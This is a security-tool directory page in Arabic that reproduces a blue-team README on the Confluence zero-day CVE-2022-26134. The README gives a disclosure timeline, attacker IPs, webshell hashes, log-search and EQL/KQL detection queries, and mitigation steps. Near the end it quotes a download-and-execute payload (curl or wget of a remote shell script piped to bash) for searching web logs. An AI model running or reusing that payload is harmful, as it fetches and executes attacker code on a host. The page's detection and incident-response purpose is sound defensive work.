Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Confluence-CVE-2022-26134 — يتحدث هذا المستودع عن Zero-Day Exploitation of Atlassian Confluence، ووجهة نظره من الدفاع والتحليل من منظور SecOps أو Blue Team | Kitploit
أدوات/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميأمن الويباستخبارات التهديداتكشف التسللالتعلم والتعليمالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

يتحدث هذا المستودع عن Zero-Day Exploitation of Atlassian Confluence، ووجهة نظره من الدفاع والتحليل من منظور SecOps أو Blue Team

عرض المستودع
4منذ 4 سنواتلم تتم المراجعة بعد

Confluence-CVE-2022-26134

يتحدث هذا المستودع عن استغلال الثغرة ذات اليوم الصفري في Atlassian Confluence، من منظور دفاعي وتحليلي من وجهة نظر فريق SecOps أو الفريق الأزرق.

الفهرس

  • حول
  • الجدول الزمني
  • فهم الاستغلال
  • قائمة مؤشرات الاختراق
  • استراتيجية الكشف
  • خطط التخفيف
  • المراجع

حول

خلال عطلة نهاية الأسبوع لعيد الذكرى في الولايات المتحدة، أجرت Volexity تحقيقًا في الاستجابة للحوادث يتعلق بخادمي ويب مواجهين للإنترنت ينتميان إلى أحد عملائها، وكانا يشغلان برنامج Atlassian Confluence Server. بدأ التحقيق بعد اكتشاف نشاط مشبوه على المضيفين، تضمن كتابة قشور ويب JSP على القرص. استخدمت Volexity على الفور Volexity Surge Collect Pro لجمع ذاكرة النظام والملفات الرئيسية من أنظمة Confluence Server للتحليل. بعد مراجعة شاملة للبيانات المجمعة، تمكنت Volexity من تحديد أن اختراق الخادم نجم عن إطلاق مهاجم لاستغلال لتحقيق تنفيذ التعليمات البرمجية عن بُعد. تمكنت Volexity لاحقًا من إعادة إنتاج هذا الاستغلال وتحديد ثغرة أمنية من نوع اليوم الصفري تؤثر على الإصدارات المحدثة بالكامل من Confluence Server.

بعد اكتشاف هذه الثغرة والتحقق منها، اتصلت Volexity بـ Atlassian للإبلاغ عن التفاصيل ذات الصلة في 31 مايو 2022. وقد أكدت Atlassian الثغرة منذ ذلك الحين وأسندت المشكلة لاحقًا إلى CVE-2022-26134. وقد تم تأكيد عملها على الإصدارات الحالية من Confluence Server وData Center.

الجدول الزمني

  • نصيحة بتاريخ 2 يونيو، الساعة 1:00 مساءً بتوقيت المحيط الهادئ (20:00 بالتوقيت العالمي الموحد)، لا تصف طبيعة الخلل، وتكشف عن "استغلال نشط حاليًا" تم اكتشافه. لا يوجد تصحيح متاح.
  • تكتشف Volexity تكتشف ثغرة يوم صفري في confluence بتاريخ 03/06/2022 (GMT)
  • في 03/06/2022 (GMT) أعلنت Atlassian
    • توضيح الإصدارات المتأثرة
    • إضافة قاعدة WAF
    • إضافة إطار زمني تقديري لتوفر الإصلاحات
  • في 03/06/2022 شهدنا محاولات استغلال نشطة وإصدارات POCs في جميع أنحاء الإنترنت.
  • في 3 يونيو 2022 الساعة 8 صباحًا بتوقيت المحيط الهادئ الصيفي (توقيت المحيط الهادئ، -7 ساعات) معلومات التخفيف من Atlassian تضمنت استبدال ملفات jar وclass
  • في 3 يونيو 2022 الساعة 10 صباحًا بتوقيت المحيط الهادئ الصيفي (توقيت المحيط الهادئ، -7 ساعات) قامت Atlassian بتحديث الإصدارات المصححة وإزالة النصيحة المؤقتة حول إضافة قاعدة WAF.
  • في 3 يونيو 2022 الساعة 4 مساءً بتوقيت المحيط الهادئ الصيفي (توقيت المحيط الهادئ، -7 ساعات) قامت Atlassian بتحديث لتوضيح القيود المتعلقة بالترقيات المتداولة.

راجع التفاصيل الفنية هنا

فهم الاستغلال

  • يمكنك الرجوع إلى مدونة Volexity هنا لفهم التفاصيل الكاملة لمبدأ عمل هذا الاستغلال وتفاصيل التحليل
  • شاهد هذا الفيديو لفهم الاستغلال وطرق معالجته.

قائمة مؤشرات الاختراق

  • نظرًا لأن هذه ثغرة من نوع اليوم الصفري ويمكن استغلالها بسهولة بالغة، فلا توجد قائمة حصرية لمؤشرات الاختراق. من أبحاث المجتمع، لوحظ أن المهاجم حاول نشر XMRIG وKINSING وMIRAI وغيرها بعد الاستغلال.
  • سلسلة الاستغلال "تبدو" أنها تحتوي على السلسلة ${ هذا النمط غير مشفر بعناوين URL وغير آمن لعناوين URL لذا سيظهر على النحو التالي: $%7B في السجلات.
  • تشير مدونة Volexity إلى ملف confluence: noop.jsp
  • وجود قشرة ويب بامتداد .jsp دون تفاصيل المسار. على سبيل المثال هذا
  • بعض عناوين IP-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • تتبعات الملفات الخبيثة noop.jsp
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • تم رصد استغلال واسع النطاق لـ Atlassian Confluence CVE-2022-26134، وتحديدًا تم تأكيد وظائفه، في 4 يونيو 2022. ابحث عن عناوين IP الفريدة من هنا

استراتيجية الكشف

  • إذا كان لديك خادم Conference Server وData Center مواجه للإنترنت وغير مُصحح، فمن الحكمة اعتباره مخترقًا
  • ابحث عن ملفات جديدة في مسار confluence على القرص بامتداد .jsp أو أي امتداد آخر.
  • ابحث عن عمليات فرعية مشبوهة من سجلات tomcat
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • ابحث عن السلسلة ${ في (install directory)/logs/*.log
  • في سجلات الوصول، جرب egrep -a -i -f pattern.txt *.log حيث يجب حفظ pattern.txt كـ ${ أو جرب فقط grep "\${" log file path أو جرب grep "$%7B" log file path
  • قد يكون لديك طلبات ويب واردة لـ noop.js، لذا يمكنك تجربة findstr -i noop.jsp "logpath"
  • قد تكون لديك أدلة تثبيت مختلفة، لذا حاول العثور على $jspname_jsp.java في دليل confluence_install_dir/work/Standalone/. على سبيل المثال، إذا وجدت اسم قشرة hack.jsp، فيجب أن ترى hack_jsp.java. إذا لم تجد hack.jsp ولم يعد موجودًا على القرص، حاول التنقل في سجلات الويب للبحث عن الوصول إليه. سيعطي ذلك دلالة على وقت الوصول إليه / حذفه.
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

لذا ابحث عن الملفات المنشأة حديثًا غير المذكورة أعلاه

  • تحقق من الملفات الموجودة على القرص غير المذكورة وفي سجلات الوصول مع استجابات 200. علاوة على ذلك، تحقق مما إذا تم تعديل أي من هذه الملفات. على وجه الخصوص، noop.jsp شائع وعادةً ما يكون حجمه حوالي 103 بايت.
  • إذا حددت أن ملف noop.jsp قد تم تنبيهك به، فاستخدم هذا النص البرمجي لتحديد ما إذا كان مشبوهًا.
  • يمكنك استخدام هذا النص البرمجي لتشغيل فحص سريع على سجلاتك لرؤية الجهات الفاعلة المحتملة. ملاحظة- يجب التحقق من قائمة IP قبل استخدام هذا، كما أن القائمة غير حصرية.
  • افحص حالات متعددة للبحث عن ملفات .java في الدليل ./confluence/org/apache/jsp/ التي لا ينبغي أن تكون هناك.
  • ابحث عن شجرة العمليات وتنفيذ العمليات على أي مضيف حددت فيه محاولة استغلال. يجب أن تبحث عن شجرة عمليات مثل- java->bash->python->bash
  • عملية bash، منبثقة من عملية python، كان أبوها عملية bash أخرى ثم عملية جافا الجذرية. يجب تحديد هذا النوع من التنفيذ

خطط التخفيف

  • اعتبارًا من أول commit لهذا المستودع، أصدرت Atlassian إصدارًا مصححًا من Confluence Server وData Center من هنا
  • إذا كنت غير قادر على ترقية Confluence فورًا، فيمكنك كحل مؤقت تخفيف مشكلة CVE-2022-26134 عن طريق تحديث الملفات التالية كما هو موضح هنا
  • كخطوة فورية، يرجى إنشاء خطة استجابة للحوادث لتحديد مثيلاتك المكشوفة على الإنترنت وتنفيذ الكشف. ووضع الخادم تحت القائمة البيضاء لعناوين IP أو تحت VPN لتقليل سطح المخاطرة.

المراجع

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
تنزيل الأداة
  • استعلام EQL process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' يمكن أن يساعد في التعريف كما وصفه David هنا
  • ابحث عن هذا الحمولة الشائعة bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash في سجلات الويب
  • يمكن العثور على توقيع Suricata هنا
  • قد يختلف إعداد الجميع ولكن Confluence يحتوي بشكل كبير على ملفات JSP هذه فقط: